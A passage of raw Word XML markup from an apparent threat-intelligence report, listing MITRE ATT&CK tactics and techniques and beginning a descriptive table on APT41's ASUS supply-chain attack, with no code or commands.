          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637BB0B"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T1102.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Dead Drop Resolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F640B"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1568.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Dynamic Resolution&gt;:Domain Generation Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607DEC09"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1090 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D500A4"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B867895" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="00CC70C1" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1486', 'T1496']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCC046" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRP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1486 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Encrypted for Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC6495" w14:textId="09EB2808" w:rsidR="00CC70C1" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1496 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B7760" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00605F46" w:rsidRDefault="00D77A9F" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442338A6" w14:textId="6EE0AF79" w:rsidR="000003D7" w:rsidRDefault="00704555" w:rsidP="001E0502">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc153480874"/>
      <w:r>
        <w:t>Double Dragon</w:t>
      </w:r>
      <w:r w:rsidR="001E0502">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>APT41, a dual espionage and</w:t>
      </w:r>
      <w:r w:rsidR="00C6049F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber crime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> operatio</w:t>
      </w:r>
      <w:r w:rsidR="00C6049F">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="0015715B">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00DF070A">
        <w:t>ASUS</w:t>
      </w:r>
      <w:r w:rsidR="0015715B">
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="16410E7A" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="000003D7">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0003D7" w:rsidRPr="002D1D50" w14:paraId="0417C8D4" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D50D73" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="91" w:name="OLE_LINK2"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0071D849" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="002D1D50" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A832464" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00387DCC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="2E9D80BA" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F802A59" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E55271" w14:textId="7E793DB0" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT</w:t>
            </w:r>
            <w:r w:rsidR="00C6049F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02987A6E" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00387DCC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="737C595E" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B602897" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="007328DE" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630206DA" w14:textId="45BF5094" w:rsidR="000003D7" w:rsidRPr="007328DE" w:rsidRDefault="00EB001B" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCDC145" w14:textId="08A8399B" w:rsidR="000003D7" w:rsidRPr="00387DCC" w:rsidRDefault="00C6049F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00C6049F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">These so-called supply chain attacks are particularly difficult to </w:t>
            </w:r>
            <w:r w:rsidRPr="00C6049F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>detect because it often involves targeting a company insider or infiltrating the company directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="418F6274" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="047D5B2C" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581F4960" w14:textId="724E1DFC" w:rsidR="000003D7" w:rsidRPr="007328DE" w:rsidRDefault="00C6049F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434ED007" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="00387DCC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="29359A8E" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C0C1AD" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D2D2E7" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FF1C593" w14:textId="2B7E80F0" w:rsidR="000003D7" w:rsidRPr="00387DCC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C6049F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="6DFE7209" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="087700B2" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58626E9A" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5339DDCA" w14:textId="42980636" w:rsidR="000003D7" w:rsidRPr="00387DCC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C6049F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="172AF377" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5569B370" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B20CEF" w14:textId="040133F9" w:rsidR="00C6049F" w:rsidRDefault="00C6049F" w:rsidP="00C6049F">
            <w:r>
              <w:t>Damage (integrity)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3381A4" w14:textId="20E7D163" w:rsidR="00C6049F" w:rsidRDefault="00C6049F" w:rsidP="00C6049F">
            <w:r>
              <w:t>Reputation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5315A661" w14:textId="08EE9DDC" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009CB727" w14:textId="3CBC3F23" w:rsidR="000003D7" w:rsidRDefault="00C6049F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="77A3AE17" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65CADAB8" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3235BCEB" w14:textId="5D332081" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="529D4D1A" w14:textId="2B6F7E64" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="08DD8B0C" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D5AABC7" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7CE235" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23FF0131" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="49F15CE0" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362C0175" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5140C4E3" w14:textId="429F4F21" w:rsidR="000003D7" w:rsidRDefault="00C6049F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CCE1B12" w14:textId="5E807765" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="5354C345" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B84E753" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="92" w:name="OLE_LINK6"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44AB2ED9" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7631108C" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000003D7" w:rsidRPr="00B857D7" w14:paraId="023C1855" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
